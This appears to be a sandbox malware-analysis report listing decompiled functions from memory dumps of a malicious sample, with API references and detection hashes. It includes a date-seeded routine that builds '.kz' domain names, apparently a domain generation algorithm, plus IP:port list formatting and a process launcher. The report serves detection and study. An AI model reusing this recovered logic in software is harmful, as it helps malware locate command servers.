Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID:
API String ID: 1384477639-0
Opcode ID: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
Instruction ID: 7d9a7ceed94e7cb146748a6a4cbe518f00b590a44153bc146dcbe4ea3ecfc3d4
Opcode Fuzzy Hash: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
Instruction Fuzzy Hash: 4711B378A087019FC700DF15D58851ABBE4FFC9714F54882EE98887325D774A949CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410FD0 Relevance: 6.0, APIs: 4, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00410FD0(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a52) {
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				long _t16;
				void* _t20;
				intOrPtr* _t22;
				long _t23;
				intOrPtr _t25;
				intOrPtr _t30;
				void* _t32;
				char** _t40;

				_t30 =  *0x422440; // 0x0
				if(_t30 == 0) {
					L4:
					asm("repe ret");
					L5:
					_t16 = GetCurrentThreadId();
					_a4 = 0;
					 *_t40 = "T%p %d %s\n";
					_a12 = _a52;
					_a8 = _t16;
					printf(??);
					L3:
					_t40 =  &(_t40[8]);
					goto L4;
				}
				_t40 = _t40 - 0x20;
				if(_a4 == 0) {
					goto L5;
				}
				 *_t40 = _a4;
				_t20 = E004107C0(_t32);
				 *_t40 = _a4;
				_t22 = E004107C0(_t32);
				_t23 = GetCurrentThreadId();
				 *_t40 = _a4;
				_t25 = E004107C0(_t32);
				_v28 =  *((intOrPtr*)(_t20 + 0x14));
				_v32 =  *_t22;
				_v36 = _t23;
				_v24 = _a8;
				 *_t40 = "T%p %d V=%0X H=%p %s\n";
				_v40 = _t25;
				printf(??);
				goto L3;
			}

0x00410fd0
0x00410fd8
0x00411043
0x00411043
0x00411045
0x00411045
0x0041104f
0x00411057
0x0041105e
0x00411062
0x00411066
0x0041103d
0x0041103d
0x00000000
0x00411042
0x00410fdd
0x00410fe6
0x00000000
0x00000000
0x00410fec
0x00410fef
0x00410ffb
0x00410ffe
0x00411005
0x00411011
0x00411014
0x0041101d
0x00411021
0x00411025
0x00411029
0x0041102d
0x00411034
0x00411038
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 00411005
printf.MSVCRT ref: 00411038
GetCurrentThreadId.KERNEL32 ref: 00411045
printf.MSVCRT ref: 00411066

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
Instruction ID: dd093ba78cb55f5ec8a20eb079ecf1fdcd36511c02614f1ce0a8f2dc342cb654
Opcode Fuzzy Hash: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
Instruction Fuzzy Hash: 6611E5B4A0A301AFC754AF65D18455BBBE0FF88710F419C2EF49487311D778D8808F86

Uniqueness

Uniqueness Score: -1.00%

Function 00415060 Relevance: 6.0, APIs: 4, Instructions: 40threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041507F
printf.MSVCRT ref: 004150BE
GetCurrentThreadId.KERNEL32 ref: 004150D0
printf.MSVCRT ref: 004150EF

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
Instruction ID: 356f6c3cb5459cc125aadc62c037ca1cfb0d2d0be776f4231c60a2ad830c665d
Opcode Fuzzy Hash: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
Instruction Fuzzy Hash: FC01EEB4A097109FC300DF15D19465BBBF0FF89710F14895EE88887324D3799945CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 040092E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				struct _SYSTEMTIME _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v172;
				void* _t46;
				intOrPtr _t50;
				void* _t83;
				void* _t84;
				void* _t86;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					GetLocalTime( &_v28);
					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
					_t84 = _t83 + 0xc;
					_v12 = _t46 + _a12;
					_v32 = 0;
					while(_v32 < _a8) {
						E04007D20( &_v172,  &_v172, 0, 0x80);
						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
						_t86 = _t84 + 0x1c;
						_v40 = _t50;
						if(_v40 <= 0) {
							_v12 = _v32 * 7 + _v12;
						} else {
							_v12 = _v172;
						}
						_v36 = _v12 % 4 + 9;
						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
						_t84 = _t86 + 0x10;
						lstrcatA(_v32 * 0x28 + _a4, ".kz");
						_v12 = _v12 + 1;
						_v8 = _v8 + 1;
						_v32 = _v32 + 1;
					}
				}
				return _v8;
			}

0x040092e9
0x040092f4
0x04009308
0x0400931d
0x04009322
0x04009328
0x0400932b
0x0400933d
0x04009357
0x04009371
0x04009376
0x04009379
0x04009380
0x04009396
0x04009382
0x04009388
0x04009388
0x040093a8
0x040093c4
0x040093c9
0x040093db
0x040093e7
0x040093f0
0x0400933a
0x0400933a
0x0400933d
0x040093fe

APIs

GetLocalTime.KERNEL32(?), ref: 04009308

Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1

lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB

Strings

.kz, xrefs: 040093CC

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
String ID: .kz
API String ID: 2740484991-4216035510
Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00413770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

:, xrefs: 00413821

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
String ID: :
API String ID: 4179344489-336475711
Opcode ID: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
Instruction ID: 7f2bcc72b8dabd0ea27cf558def7b07d1e8a971bd1b24fbec1df22c7a9c3dfa5
Opcode Fuzzy Hash: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
Instruction Fuzzy Hash: 6E2153F07083019FD714AF25E54529ABBE0BF84348F45C82EE4C98B346D7B898C5CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00414F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

0, xrefs: 00414FE2

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
String ID: 0
API String ID: 4179344489-4108050209
Opcode ID: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
Instruction ID: eb42ebfda6e5f1041a8337c8b64236a6e2dcba6debdfecdf6c0171dcc16b8b9a
Opcode Fuzzy Hash: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
Instruction Fuzzy Hash: AE213DB06092559FC714EF25E59425ABBE0BBD0348F45882EE4894B351D7B898C9CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 10002430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2

Strings

@, xrefs: 10002453

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51

Uniqueness

Uniqueness Score: -1.00%

Function 040078D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t46;

				_v5 = 0;
				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
					_v16 = 0;
					while(_v16 < _a8) {
						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
						_push(_v12);
						L0400B1EC();
						_v20 = _t31;
						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
						_t46 = _t46 + 0x20;
						_v16 = _v16 + 1;
					}
					_v5 = 1;
				}
				return _v5;
			}

0x040078d6
0x040078de
0x040078f8
0x0400790a
0x04007922
0x0400792d
0x0400792e
0x04007933
0x0400795a
0x04007960
0x04007907
0x04007907
0x04007965
0x04007965
0x0400796f

APIs

inet_ntoa.WS2_32(00000000), ref: 0400792E
wnsprintfA.SHLWAPI ref: 0400795A

Strings

%s:%u, xrefs: 04007949

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: inet_ntoawnsprintf
String ID: %s:%u
API String ID: 890441721-1474915593
Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04001E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04001E60(CHAR* _a4) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;

				_v8 = 0;
				if(_a4 != 0) {
					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
					_v100.cb = 0x44;
					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
						CloseHandle(_v24.hThread);
						_v8 = _v24.hProcess;
					}
				}
				return _v8;
			}

0x04001e66
0x04001e71
0x04001e8b
0x04001e93
0x04001ebc
0x04001ec2
0x04001ecb
0x04001ecb
0x04001ebc
0x04001ed4

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
CloseHandle.KERNEL32(?), ref: 04001EC2

Strings

D, xrefs: 04001E93

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: D
API String ID: 3712363035-2746444292
Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00416BA0 Relevance: 5.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00416BA0(intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				signed int* _v36;
				intOrPtr _v40;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t45;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;

				_t60 = _a4;
				_t45 =  *_t60;
				_t59 = _t45 + 0x14;
				 *_t61 = _t59;
				EnterCriticalSection(??);
				_t32 =  *((intOrPtr*)(_t45 + 0xc));
				_t62 = _t61 - 4;
				if(_t32 == 0) {
					_t33 =  *((intOrPtr*)(_t45 + 0x10));
					if(_t33 == 0x3ffffffe) {
						_t34 = _t45 + 0x60;
						_v32 = _t34;
						_t35 = _t45 + 0x48;
						_v36 = _t35;
						 *((intOrPtr*)(_t45 + 0x10)) = 0x3fffffff;
						_v40 = _t34;
						 *_t62 = _t35;
						_t37 = E00416590( *((intOrPtr*)(_t45 + 0x68)), 0xffffffff, 1);
						if(_t37 != 0) {
							L13:
							_v32 = _t37;
							 *_t62 = _t59;
							LeaveCriticalSection(??);
							_t38 = _v32;
							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
						} else {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 8)) -  *((intOrPtr*)(_t45 + 0x10));
							 *_t62 = _v32;
							_t37 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _v36, 1);
							if(_t37 != 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t45 + 0x10)) = 0;
								goto L9;
							}
						}
					} else {
						 *((intOrPtr*)(_t45 + 0x10)) = _t33 + 1;
						L9:
						 *_t62 = _t59;
						LeaveCriticalSection(??);
						_t64 = _t62 - 4;
						goto L4;
					}
				} else {
					_v32 = _t32;
					 *((intOrPtr*)(_t45 + 0xc)) = _t32 - 1;
					 *_t62 = _t59;
					LeaveCriticalSection(??);
					_t64 = _t62 - 4;
					if(_v32 != 1) {
						L4:
						 *_t64 =  *((intOrPtr*)(_t60 + 4));
						_t38 = E00413FD0();
						if(_t38 != 0) {
							goto L5;
						}
					} else {
						 *_t64 = _t45 + 0x60;
						_t38 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _t45 + 0x48, 1);
						if(_t38 != 0) {
							L5:
							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
						} else {
							goto L4;
						}
					}
				}
				return _t38;
			}

0x00416ba9
0x00416bac
0x00416bae
0x00416bb1
0x00416bb4
0x00416bba
0x00416bbd
0x00416bc2
0x00416c20
0x00416c28
0x00416c40
0x00416c45
0x00416c48
0x00416c4d
0x00416c53
0x00416c5a
0x00416c63
0x00416c6b
0x00416c72
0x00416ca0
0x00416ca0
0x00416ca3
0x00416ca6
0x00416caf
0x00416cb2
0x00416c74
0x00416c7f
0x00416c85
0x00416c8b
0x00416c92
0x00000000
0x00416c94
0x00416c94
0x00000000
0x00416c94
0x00416c92
0x00416c2a
0x00416c2d
0x00416c30
0x00416c30
0x00416c33
0x00416c39
0x00000000
0x00416c39
0x00416bc4
0x00416bc7
0x00416bca
0x00416bcd
0x00416bd0
0x00416bd9
0x00416bdf
0x00416c00
0x00416c03
0x00416c06
0x00416c0d
0x00000000
0x00000000
0x00416be1
0x00416bea
0x00416bf2
0x00416bf9
0x00416c0f
0x00416c12
0x00000000
0x00000000
0x00000000
0x00416bf9
0x00416bdf
0x00416c1b

APIs

EnterCriticalSection.KERNEL32 ref: 00416BB4
LeaveCriticalSection.KERNEL32 ref: 00416BD0

Part of subcall function 00415CC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
Part of subcall function 00415CC0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB

LeaveCriticalSection.KERNEL32 ref: 00416C33

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
Instruction ID: afac81c6ed25875daa77134f2d8d7e06c8d97d8ea1c66be795d6737b6d9f3f86
Opcode Fuzzy Hash: 8458b5734e16408b39341963bf49e5e1ccedcd04d7dc40a0a900725c30042377
Instruction Fuzzy Hash: F5311874A003058FCB10EF69D4846AABBF4FF48314F01856AEC958B345E738E886CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00416830 Relevance: 5.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00416830(intOrPtr* _a4) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr* _t54;

				_t23 = 0x16;
				_t52 = _t51 - 0x10;
				_t41 = _a4;
				if(_t41 == 0) {
					L4:
					return _t23;
				}
				_t36 =  *_t41;
				if(_t36 == 0) {
					goto L4;
				}
				if(_t36 == 0xffffffff) {
					_t23 = 0;
					goto L4;
				}
				if( *_t36 == 0xc0bab1fd) {
					_t3 = _t36 + 0x14; // 0x40ef44
					_t49 = _t3;
					 *_t52 = _t49;
					EnterCriticalSection(??);
					_t4 = _t36 + 0xc; // 0x26748d
					_t24 =  *_t4;
					_t54 = _t52 - 4;
					if(_t24 == 0) {
						_t10 = _t36 + 0x10; // 0x424448b
						if( *((intOrPtr*)(_t36 + 8)) <=  *_t10) {
							L15:
							 *_t54 = _t49;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = 0;
							goto L4;
						}
						_t12 = _t36 + 0x68; // 0x5f74c085
						_t13 = _t36 + 0x60; // 0x40ef90
						_v24 = _t13;
						_t15 = _t36 + 0x48; // 0x40ef78
						 *_t54 = _t15;
						_t28 = E00416590( *_t12, 0xffffffff, 1);
						if(_t28 != 0) {
							_v16 = _t28;
							 *_t54 = _t49;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = _v16;
							goto L4;
						}
						_t16 = _t36 + 0x10; // 0x424448b
						_t45 =  *_t16;
						_t17 = _t36 + 8; // 0x90c3ffff
						_t30 =  *_t17;
						if(_t45 != 0) {
							 *((intOrPtr*)(_t36 + 0x10)) = 0;
							_t30 = _t30 - _t45;
						}
						 *((intOrPtr*)(_t36 + 8)) = _t30 - 1;
						 *((intOrPtr*)(_t36 + 0xc)) = 1;
						L9:
						 *_t54 = _t49;
						LeaveCriticalSection(??);
						_t8 = _t36 + 0x64; // 0x8b0000
						_t9 = _t36 + 0x2c; // 0x40ef5c
						 *((intOrPtr*)(_t54 - 4)) = _t36 + 0x44;
						_t33 = E00415CC0( *_t8, _t9, 1);
						E00412210();
						_t23 = _t33;
						goto L4;
					}
					_t5 = _t36 + 8; // 0x90c3ffff
					_t47 =  *_t5;
					if(_t47 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t36 + 8)) = _t47 - 1;
					 *((intOrPtr*)(_t36 + 0xc)) = _t24 + 1;
					goto L9;
				}
				goto L4;
			}

0x00416831
0x0041683a
0x0041683d
0x00416842
0x00416857
0x0041685d
0x0041685d
0x00416844
0x00416848
0x00000000
0x00000000
0x0041684d
0x00416860
0x00000000
0x00416860
0x00416855
0x00416864
0x00416864
0x00416867
0x0041686a
0x00416870
0x00416870
0x00416873
0x00416878
0x004168c0
0x004168c6
0x00416910
0x00416910
0x00416913
0x0041691c
0x00416921
0x00000000
0x00416921
0x004168c8
0x004168cb
0x004168d3
0x004168d7
0x004168da
0x004168e2
0x004168e9
0x00416928
0x0041692b
0x0041692e
0x00416937
0x0041693c
0x00000000
0x0041693c
0x004168eb
0x004168eb
0x004168ee
0x004168ee
0x004168f3
0x004168f5
0x004168fc
0x004168fc
0x00416901
0x00416904
0x00416891
0x00416891
0x00416894
0x0041689a
0x0041689d
0x004168ab
0x004168ae
0x004168b5
0x004168ba
0x00000000
0x004168ba
0x0041687a
0x0041687a
0x0041687f
0x00000000
0x00000000
0x0041688b
0x0041688e
0x00000000
0x0041688e
0x00000000

APIs

EnterCriticalSection.KERNEL32(0040EF30,?,?,0041586E), ref: 0041686A
LeaveCriticalSection.KERNEL32(?,?,?,?,0041586E), ref: 00416894

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
